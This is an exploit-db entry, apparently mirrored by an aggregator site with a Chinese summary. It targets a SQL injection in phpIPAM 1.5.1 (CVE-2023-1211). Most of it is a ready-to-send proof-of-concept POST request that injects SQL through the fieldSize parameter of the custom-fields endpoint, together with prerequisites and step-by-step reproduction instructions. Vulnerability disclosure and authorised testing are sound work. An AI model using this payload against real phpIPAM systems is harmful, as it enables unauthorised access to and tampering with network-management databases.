[webapps] phpIPAM 1.5.1 - SQL Injection
文章描述了phpIPAM 1.5.1版本中的一个SQL注入漏洞(CVE-2023-1211),通过向`/app/admin/custom-fields/edit-result.php`发送恶意POST请求实现。攻击者需具备有效会话cookie和CSRF令牌,并利用`fieldSize`参数在枚举字段类型定义中注入SQL代码。该漏洞可导致敏感数据泄露或其他恶意操作。 2025-12-2 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:1 收藏
文章描述了phpIPAM 1.5.1版本中的一个SQL注入漏洞(CVE-2023-1211),通过向`/app/admin/custom-fields/edit-result.php`发送恶意POST请求实现。攻击者需具备有效会话cookie和CSRF令牌,并利用`fieldSize`参数在枚举字段类型定义中注入SQL代码。该漏洞可导致敏感数据泄露或其他恶意操作。 2025-12-2 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:1 收藏
# Exploit Title: phpIPAM 1.5.1 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.5.1
# Tested on: Windows
# CVE : CVE-2023-1211
Proof Of Concept
POST /app/admin/custom-fields/edit-result.php HTTP/1.1
Host: phpipam
Cookie: PHPSESSID=<valid_session_id>; csrf_cookie=<valid_csrf_token>
Content-Type: application/x-www-form-urlencoded
csrf_cookie=<valid_csrf_token>&action=add&name=custom_sqli_test&fieldType=enum&fieldSize=0)%3B+SELECT+SLEEP(10)%3B+--+&table=devices&Comment=sql_poc&NULL=YES
**Prerequisites:**
1. Valid authenticated session (PHPSESSID cookie)
2. Valid CSRF token (obtain from `/admin/custom-fields/` page first)
3. Target table must exist (default 'devices' table used)
4. Field type must be enum/set to reach vulnerable code path
**Manual Test Steps:**
1. Login to phpIPAM
2. Visit `/admin/custom-fields/` to get CSRF token
3. Send POST request with above payload
**Note:** Replace `<valid_session_id>` and `<valid_csrf_token>` with actual values from authenticated session. The `fieldSize` parameter injects SQL through enum/set type definition context.
Steps to Reproduce
Login as an admin user.
Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie and csrf token.
Observe the result
文章来源: https://www.exploit-db.com/exploits/52444
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh